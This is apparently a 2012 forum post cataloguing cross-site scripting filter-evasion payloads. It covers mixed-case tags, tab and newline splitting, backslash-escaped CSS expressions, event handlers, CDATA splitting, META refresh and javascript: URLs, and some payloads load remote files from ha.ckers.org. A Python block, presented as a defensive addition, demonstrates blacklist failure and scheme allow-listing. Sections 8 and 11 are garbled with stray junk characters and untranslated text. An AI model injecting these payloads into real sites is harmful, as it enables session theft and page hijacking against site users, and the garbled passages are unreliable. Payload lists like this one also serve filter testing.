Introduction to Cross-Site Scripting (XSS) attack techniques

Original poster, posted on 2012-12-31 09:59:28
1. Change the case of the characters

    <sCript>alert('d')</scRipT>

2. Add extra characters to get past regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use a different extension instead of .js

    <script src="bad.jpg"></script>

4. Put the JavaScript inside a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {

               background-image: url('javascript:alert("XSS");')

          }

5. Insert other characters into the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a newline to evade

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

    (the gaps inside "javascript" above are tab or newline characters, flattened to spaces on this page)

         -> tab

         -> newline
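The case, extra-character and tab/newline tricks in sections 1, 5 and 6 all aim at blacklist filters that match a fixed spelling. The Python below is an added defensive example, not code from the original post: it runs a naive blacklist over constructed samples of those payloads to show what it misses, then applies the approach that does not depend on spelling at all, namely browser-style normalization with a scheme allow-list for URL attributes and output encoding for text. The sample strings and function names are this example's own.

```python
import html
import re

# Constructed samples mirroring the evasion tricks in sections 1, 5 and 6.
SAMPLES = [
    "<sCript>alert('d')</scRipT>",          # 1: mixed case
    '<SCRIPT/SRC="t.js"></SCRIPT>',         # 5: extra character inside the tag
    "jav\tascr\tipt:alert('XSS3')",         # 6: tabs inside the scheme
    "jav\nascript:alert('XSS')",            # 6: newline inside the scheme
]

# A naive, case-sensitive blacklist of the kind these payloads get past.
NAIVE = re.compile(r"<script>|javascript:")

def naive_blocks(s: str) -> bool:
    return NAIVE.search(s) is not None

def normalize(s: str) -> str:
    """Take the same liberties a browser takes before parsing a URL:
    drop ASCII control characters (tab, LF, CR, ...), trim, fold case."""
    return re.sub(r"[\x00-\x1f\x7f]", "", s).strip().lower()

# A scheme is letters/digits/+.- up to the first colon (RFC 3986 shape).
SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):")

def url_scheme(u: str) -> str:
    """Scheme of the URL as a browser would see it; '' for relative URLs."""
    m = SCHEME.match(normalize(u))
    return m.group(1) if m else ""

def is_allowed_url(u: str) -> bool:
    """Allow-list the scheme instead of black-listing 'javascript:'."""
    return url_scheme(u) in ("", "http", "https")

def render_text(s: str) -> str:
    """Untrusted text placed in the HTML body: encode it, do not filter it."""
    return html.escape(s, quote=True)

def render_link(u: str) -> str:
    """Untrusted URL placed in an href: validate the scheme, then encode."""
    safe = u if is_allowed_url(u) else "about:blank"
    return '<a href="%s">link</a>' % html.escape(safe, quote=True)

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:40} naive_blocks={naive_blocks(s)!s:5} "
              f"scheme={url_scheme(s)!r:13} text={render_text(s)}")
```

Every sample slips past naive_blocks, while url_scheme reports "javascript" for the tab and newline variants and render_text leaves no tag for the browser to parse.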

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. 使用Hex encode来规避(也可能会把";"拿掉)
* b) O, u# [, M# s1 u7 b9 a& b/ H9 F1 S8 q
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">" u, b5 P% W5 l0 }9 J
# [9 U) M! v. v9 b. W
        原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">% ?5 p+ l2 e) Z- `; ]7 S
5 o% z+ o2 d/ S1 V
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">! x8 m; T4 v7 y, w% v  U
) s0 N: b+ r% C3 A( W
        原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
$ B) s3 b# @8 {2 P$ p3 p# V* E8 e/ C3 c9 H" A
9. Script in an HTML tag's event handler

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code embedded in a SWF file

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

& w0 u( h" J. A) Q11. 利用CDATA将xss的code拆开,再组合起来。
1 c5 f4 T' `2 \; m
8 ~0 p& e7 n4 V8 W/ W- L* U0 Z    <XML ID=I><X><C>
( k: X6 D" a( p( l- P6 w2 J5 [
: \! y8 p5 m, f& e# k* [1 s: q, p    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>3 X9 F0 j, K4 J; b1 K, D

; e6 \) M# ], Q' r+ {' a8 |    </C></X>. p6 Y+ p  B7 H) |/ b

7 ~, o* i3 `5 S4 p4 r    </xml>
1 [" ?2 q$ f: y9 H% }' W$ B0 X4 Y- _% F
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
! G  r2 N; T7 \7 f2 F" |
$ I8 u, q% T) t6 G( O    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
5 H8 p! }. ?# W) V/ f: T8 l- K3 B7 |1 @' F
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>& Y0 U! ?" r8 ~3 V# W5 ~; G( E, p5 v
4 H, K- K8 o1 s8 c
12. Use HTML+TIME.

    <HTML><BODY>

    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

    <?import namespace="t" implementation="#default#time2">

    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert(&quot;XSS&quot;)</SCRIPT>">

    </BODY></HTML>

13. Write a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript: in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}

    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
